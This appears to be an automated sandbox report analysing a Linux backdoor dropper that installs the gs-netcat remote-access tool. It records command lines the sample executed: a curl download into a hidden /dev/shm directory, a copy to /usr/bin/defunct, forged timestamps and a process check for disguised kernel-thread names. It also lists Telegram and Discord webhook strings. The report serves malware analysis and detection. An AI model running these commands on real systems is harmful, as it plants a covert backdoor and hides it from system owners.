Linux Analysis Report
y

Overview

General Information

Sample name: y
Analysis ID: 1523256
MD5: b4ae01a2cca1052689c00d8ff4e94524
SHA1: 9d8b20bb6bb0471c16dfe8ccadc0a9441bd986ce
SHA256: 9cc787ca0b6e698b62f6e8ca5da6f2183a350acda9098b4194aa1894dcd39690

Detection

Score: 76
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Explicitly modifies time stamps using the "touch" command
Sample deletes itself
Writes ELF files to hidden directories
Writes identical ELF files to multiple locations
Changes permissions of common UNIX (system) binary directories
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "base64" command used to encode or decode data (e.g. files, payloads)
Executes the "chmod" command used to modify permissions
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "mkdir" command used to create folders
Executes the "pgrep" command search for and/or send signals to processes
Executes the "rm" command used to delete files or directories
Executes the "touch" command used to create files or modify time stamps
Executes the "uname" command used to read OS and architecture name
Found strings indicative of a multi-platform dropper
Reads CPU information from /sys indicative of miner or evasive malware
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

AV Detection

Source: /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64 Avira: detection malicious, Label: LINUX/AVI.Agent.wrdff
Source: /usr/bin/defunct Avira: detection malicious, Label: LINUX/AVI.Agent.wrdff
Source: y ReversingLabs: Detection: 41%
Source: y Virustotal: Detection: 39%
Source: /usr/bin/pgrep (PID: 6287) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pgrep (PID: 6289) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: y String: # - Command to use for download. =wget or =curl.
Source: y String: # errexit "Need curl or wget."
Source: y String: FAIL_OUT "Need curl or wget. Try ${CM}apt install curl${CN}"
Source: /usr/bin/curl (PID: 6337) Reads hosts file: /etc/hosts
Source: /usr/bin/defunct (PID: 6353) Reads hosts file: /etc/hosts
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /bin/gs-netcat_mini-linux-x86_64 HTTP/1.1 Host: cdn.gsocket.io User-Agent: curl/7.68.0 Accept: */*
Source: global traffic DNS traffic detected: DNS query: cdn.gsocket.io
Source: global traffic DNS traffic detected: DNS query: c.gs.thc.org
Source: y String found in binary or memory: https://api.telegram.org/bot$
Source: y String found in binary or memory: https://cdn.gsocket.io
Source: y String found in binary or memory: https://discord.com/api/webhooks/$
Source: y String found in binary or memory: https://foo.blah/log.php?s=
Source: y String found in binary or memory: https://github.com/hackerschoice/gsocket-relay
Source: y String found in binary or memory: https://github.com/hackerschoice/gsocket/releases$
Source: y String found in binary or memory: https://gsocket.io
Source: y String found in binary or memory: https://gsocket.io/x)
Source: y String found in binary or memory: https://t.me/thcorg$
Source: y String found in binary or memory: https://webhook.site
Source: y String found in binary or memory: https://webhook.site/$
Source: y String found in binary or memory: https://www.gsocket.io/deploy/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38076
Source: unknown Network traffic detected: HTTP traffic on port 40962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40962
Source: Initial sample String containing 'busybox' found: # Must use same name on busybox-systems
Source: Initial sample String containing 'busybox' found: # Create empty crontab (busybox) if no crontab exists at all.
Source: classification engine Classification label: mal76.evad.lin@0/2@3/0

Persistence and Installation Behavior

Source: /usr/bin/bash (PID: 6356) Touch executable uses timestamp modification options: touch -t 202410010411.39 /dev/shm
Source: /usr/bin/bash (PID: 6357) Touch executable uses timestamp modification options: touch -t 202109170423.51 /usr/bin
Source: /usr/bin/bash (PID: 6358) Touch executable uses timestamp modification options: touch -t 200611251713.29 /usr/bin/defunct
Source: /usr/bin/curl (PID: 6337) File written to hidden directory: /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64
Source: /usr/bin/curl (PID: 6337) File with SHA-256 D94F75A70B5CABAF786AC57177ED841732E62BDCC9A29E06E5B41D9BE567BCFA written: /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64
Source: /usr/bin/cp (PID: 6347) File with SHA-256 D94F75A70B5CABAF786AC57177ED841732E62BDCC9A29E06E5B41D9BE567BCFA written: /usr/bin/defunct
Source: /usr/bin/bash (PID: 6318) Chmod directory: /usr/bin/chmod -> chmod 600 /usr/bin/defunct
Source: /usr/bin/bash (PID: 6346) Chmod directory: /usr/bin/chmod -> chmod 600 /usr/bin/defunct
Source: /usr/bin/bash (PID: 6350) Chmod directory: /usr/bin/chmod -> chmod 700 /usr/bin/defunct
Source: /usr/bin/mkdir (PID: 6302) Directory: /dev/shm/.gs-0
Source: /usr/bin/touch (PID: 6305) File: /dev/shm/.gs-0/.gs-rw.lock
Source: /usr/bin/curl (PID: 6337) Directory: /root/.curlrc
Source: /usr/bin/touch (PID: 6305) Empty hidden file: /dev/shm/.gs-0/.gs-rw.lock
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1582/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1582/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/3088/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/3088/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/230/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/230/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/110/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/110/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/231/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/231/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/111/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/111/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/232/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/232/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1579/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1579/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/112/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/112/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/233/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/233/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1699/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1699/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/113/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/113/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/234/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/234/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1335/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1335/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1698/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1698/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/114/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/114/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/235/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/235/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1334/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1334/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1576/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1576/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/2302/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/2302/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/115/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/115/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/236/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/236/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/116/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/116/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/237/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/237/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/117/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/117/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/118/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/118/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/910/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/910/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/119/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/119/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/912/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/912/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/10/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/10/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/2307/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/2307/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/11/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/11/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/918/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/918/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/12/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/12/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/13/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/13/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/14/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/14/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/15/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/15/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/16/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/16/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/17/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/17/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/18/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/18/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1594/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1594/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/120/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/120/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/121/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/121/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1349/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1349/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/122/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/122/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/243/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/243/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/123/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/123/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/2/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/2/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/124/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/124/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/3/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/3/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/4/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/4/cmdline
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/125/status
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/125/cmdline
Source: /usr/bin/bash (PID: 6291) Shell command executed: /bin/bash -c "echo TRUE"
Source: /usr/bin/bash (PID: 6303) Chmod executable: /usr/bin/chmod -> chmod 700 /dev/shm/.gs-0
Source: /usr/bin/bash (PID: 6318) Chmod executable: /usr/bin/chmod -> chmod 600 /usr/bin/defunct
Source: /usr/bin/bash (PID: 6346) Chmod executable: /usr/bin/chmod -> chmod 600 /usr/bin/defunct
Source: /usr/bin/bash (PID: 6350) Chmod executable: /usr/bin/chmod -> chmod 700 /usr/bin/defunct
Source: /usr/bin/bash (PID: 6337) Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 7 -m900 --retry 3 https://cdn.gsocket.io/bin/gs-netcat_mini-linux-x86_64 --output /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64
Source: /usr/bin/bash (PID: 6302) Mkdir executable: /usr/bin/mkdir -> mkdir /dev/shm/.gs-0
Source: /usr/bin/bash (PID: 6287) Pgrep executable: /usr/bin/pgrep -> pgrep defunct
Source: /usr/bin/bash (PID: 6289) Pgrep executable: /usr/bin/pgrep -> pgrep (\\[kstrp\\]|\\[watchdogd\\]|\\[ksmd\\]|\\[kswapd0\\]|\\[card0\\-crtc8\\]|\\[mm\\_percpu\\_wq\\]|\\[rcu\\_preempt\\]|\\[kworker\\]|\\[raid5wq\\]|\\[slub\\_flushwq\\]|\\[netns\\]|\\[kaluad\\])
Source: /usr/bin/bash (PID: 6306) Rm executable: /usr/bin/rm -> rm -f /dev/shm/.gs-0/.gs-rw.lock
Source: /usr/bin/bash (PID: 6343) Rm executable: /usr/bin/rm -> rm -f /usr/bin/defunct
Source: /usr/bin/bash (PID: 6349) Rm executable: /usr/bin/rm -> rm -f /dev/shm/.gs-0/gs-netcat
Source: /usr/bin/bash (PID: 6354) Rm executable: /usr/bin/rm -> rm -rf /dev/shm/.gs-0/*
Source: /usr/bin/bash (PID: 6305) Touch executable: /usr/bin/touch -> touch /dev/shm/.gs-0/.gs-rw.lock
Source: /usr/bin/bash (PID: 6317) Touch executable: /usr/bin/touch -> touch /usr/bin/defunct
Source: /usr/bin/bash (PID: 6345) Touch executable: /usr/bin/touch -> touch /usr/bin/defunct
Source: /usr/bin/bash (PID: 6356) Touch executable: /usr/bin/touch -> touch -t 202410010411.39 /dev/shm
Source: /usr/bin/bash (PID: 6357) Touch executable: /usr/bin/touch -> touch -t 202109170423.51 /usr/bin
Source: /usr/bin/bash (PID: 6358) Touch executable: /usr/bin/touch -> touch -t 200611251713.29 /usr/bin/defunct
Source: /usr/bin/chmod (PID: 6303) File: /dev/shm/.gs-0 (bits: - usr: - grp: - all: rwx)
Source: /usr/bin/chmod (PID: 6350) File: /usr/bin/defunct (bits: - usr: - grp: - all: rwx)
Source: /usr/bin/curl (PID: 6337) File written: /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64
Source: /usr/bin/cp (PID: 6347) File written: /usr/bin/defunct
Source: /usr/bin/bash (PID: 6241) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g
Source: /usr/bin/bash (PID: 6244) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g
Source: /usr/bin/bash (PID: 6247) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g
Source: /usr/bin/bash (PID: 6250) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g
Source: /usr/bin/bash (PID: 6253) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g
Source: /usr/bin/bash (PID: 6256) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g
Source: /usr/bin/bash (PID: 6259) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g
Source: /usr/bin/bash (PID: 6262) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g
Source: /usr/bin/bash (PID: 6265) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g
Source: /usr/bin/bash (PID: 6268) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g
Source: /usr/bin/bash (PID: 6271) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g
Source: /usr/bin/bash (PID: 6274) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g
Source: /usr/bin/bash (PID: 6285) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g

Hooking and other Techniques for Hiding and Protection

Source: /usr/bin/cp (PID: 6347) File: /usr/bin/defunct
Source: /usr/bin/rm (PID: 6343) File: /usr/bin/defunct
Source: /usr/bin/bash (PID: 6280) Base64 executable: /usr/bin/base64 -> base64 -w0
Source: /usr/bin/bash (PID: 6281) Base64 executable: /usr/bin/base64 -> base64 -d
Source: /usr/bin/bash (PID: 6327) Base64 executable: /usr/bin/base64 -> base64 -w0
Source: /usr/bin/bash (PID: 6331) Base64 executable: /usr/bin/base64 -> base64 -w0
Source: /usr/bin/bash (PID: 6335) Base64 executable: /usr/bin/base64 -> base64 -w0
Source: /usr/bin/bash (PID: 6238) Queries kernel information via 'uname':
Source: /usr/bin/uname (PID: 6277) Queries kernel information via 'uname':
Source: /bin/bash (PID: 6291) Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 6337) Queries kernel information via 'uname':
Source: /usr/bin/bash (PID: 6277) Uname executable: /usr/bin/uname -> uname -m